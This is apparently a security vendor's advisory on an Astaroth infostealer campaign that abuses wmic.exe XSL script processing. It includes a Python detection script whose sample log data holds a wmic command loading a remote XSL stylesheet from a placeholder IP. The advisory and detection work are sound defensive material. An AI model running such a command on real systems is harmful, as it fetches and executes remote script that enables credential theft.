LTS Secure Warning: New Mal-Spam Campaign Identified Delivering Infostealer.Astaroth With Advanced Evasion Techniques

A new version of the Astaroth malware has surfaced and is abusing native Microsoft tools to evade common security solutions. Attackers are delivering it through mal-spam campaigns that mostly target users in Brazil and European countries.


Technical Details

The trojan makes its way onto the victim's computer via a .zip file attached to a spam email. Once the .zip is downloaded and extracted, it yields a .lnk file that, when opened, starts the infection process. That process uses wmic.exe to launch an XSL script processing attack: wmic.exe accepts an XSL stylesheet through its /format: switch and will process script embedded in that stylesheet, including one fetched from a remote location. This lets the malware contact a remote C&C server and send sensitive/personal information from the infected machine to the attacker.

The XSL file additionally contains heavily obfuscated code that can carry out further malicious activity and helps hide the malware from anti-virus products.
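As an added illustration of where defenders can catch this technique (example code written for this advisory, not code from Astaroth or from any LTS Secure product), the following Python runs a simple hunt over constructed process-creation records and flags wmic.exe invocations whose /format: argument points to a remote or explicit XSL stylesheet rather than one of the built-in format keywords. The record field names, hostnames and paths are assumptions made for the example.

```python
import re
from typing import Dict, List, Optional

# Constructed sample process-creation records (Sysmon Event ID 1 style).
# Field names and values are made up for this example; they are not from a real log.
SAMPLE_EVENTS: List[Dict[str, str]] = [
    {"Image": r"C:\Windows\System32\wbem\WMIC.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r'wmic os get /format:"https://198.51.100.7/update.xsl"'},
    {"Image": r"C:\Windows\System32\wbem\WMIC.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"wmic process get name,processid"},
    {"Image": r"C:\Windows\System32\wbem\WMIC.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r"wmic os get /format:C:\Users\Public\report.xsl"},
    {"Image": r"C:\Windows\System32\wbem\WMIC.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"wmic os get /format:list"},
    {"Image": r"C:\Windows\System32\notepad.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r"notepad.exe notes.txt"},
]

# /format: takes either a built-in format keyword (list, csv, xml, ...) or a
# path/URL to an XSL stylesheet; the value may be quoted.
FORMAT_RE = re.compile(r'/format:\s*"?([^"\s]+)"?', re.IGNORECASE)


def classify_wmic_format(command_line: str) -> Optional[str]:
    """Return 'remote-xsl', 'local-xsl' or None for a wmic command line."""
    m = FORMAT_RE.search(command_line)
    if not m:
        return None
    target = m.group(1).lower()
    if "://" in target or target.startswith("\\\\"):
        return "remote-xsl"   # stylesheet fetched over HTTP(S) or from a UNC share
    if "\\" in target or "/" in target or target.endswith(".xsl"):
        return "local-xsl"    # explicit stylesheet path instead of a built-in keyword
    return None


def hunt(events: List[Dict[str, str]]) -> List[Dict[str, object]]:
    """Flag wmic.exe executions that load a non-built-in XSL stylesheet."""
    hits = []
    for i, ev in enumerate(events):
        if not ev["Image"].lower().endswith("\\wmic.exe"):
            continue
        reason = classify_wmic_format(ev["CommandLine"])
        if reason is None:
            continue
        hits.append({
            "index": i,
            "reason": reason,
            # A user double-clicking a .lnk in Explorer gives explorer.exe as the
            # parent process, which matches the delivery chain described above.
            "launched_from_explorer": ev["ParentImage"].lower().endswith("\\explorer.exe"),
            "command_line": ev["CommandLine"],
        })
    return hits


if __name__ == "__main__":
    for hit in hunt(SAMPLE_EVENTS):
        print(f"[{hit['reason']}] parent_is_explorer={hit['launched_from_explorer']} "
              f"{hit['command_line']}")
```

The built-in format keywords carry no path separator or extension, so anything with a scheme, a UNC prefix, a path separator or an .xsl suffix is treated as an externally supplied stylesheet; an explorer.exe parent is recorded as supporting context rather than as a condition, since wmic.exe can equally be launched by a script or an Office process.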


Impact

  • Logs the user's keystrokes.
  • Interferes with operating system calls.
  • Gathers information saved to the clipboard.
  • Steals sensitive/confidential information such as login credentials for banking sites, cookies, etc.


Recommended Actions

  • Never download suspicious attachments or click shady-looking links.
  • Educate your users on how to identify mal-spam.
  • Avoid downloading and using freeware applications from untrusted sources.
  • Keep your anti-virus software updated with the latest releases.
  • Run a periodic full system scan.
  • Monitor and alert on wmic.exe invocations whose /format: argument points to a remote or unusual XSL stylesheet; because this campaign abuses a native Microsoft tool, signature-based anti-virus alone may not catch it.


LTS Secure Locations
  • Florida: 407-965-5509
  • Los Angeles: 323-544-5013
  • Mid West: 800 689 4506
  • Chicago/Midwest: 2406 Schumacher Drive, Mishawaka, IN, 46545
  • 201, Tower S4, Phase II, Cybercity, Magarpatta Township, Hadapsar, Pune-411013